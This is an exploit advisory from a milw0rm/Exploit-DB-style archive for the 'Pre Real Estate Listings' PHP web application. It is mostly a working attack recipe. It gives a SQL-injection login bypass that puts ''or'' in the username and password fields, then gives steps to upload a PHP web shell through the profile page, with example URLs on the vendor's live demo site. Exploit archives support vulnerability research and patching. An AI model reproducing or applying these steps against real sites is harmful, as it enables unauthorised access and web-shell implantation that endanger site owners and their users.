Pre Real Estate Listings File Upload Vulnerability

2008-11-11T00:00:00
ID EDB-ID:7094
Type exploitdb
Reporter BackDoor
Modified 2008-11-11T00:00:00

Description

Pre Real Estate Listings File Upload Vulnerability. CVE-2008-6798,CVE-2008-7052. Webapps exploit for php platform

                                        
                                            Pre Real Estate Listings (login.php) ByPass /File Upload
Script:Pre Real Estate Listings
HomePage:http://preproject.com/
Demo:http://preproject.com/ulisting/
Author:BackDoor
By Pass Exploit:
http://victim.com/scriptpath/login.php username:'or' password:'or'
Live Demo:
http://preproject.com/ulisting/login.php
File Upload Exploit:
login live demo username:'or' password:'or'
Edit Your Profile Link:http://preproject.com/ulisting/profile.php
Upload Your Shell:
Example:
http://preproject.com/ulisting/re_images/1221553817_logo_wp.php
 
Cyber-Security TIM //Lojistik

# milw0rm.com [2008-11-11]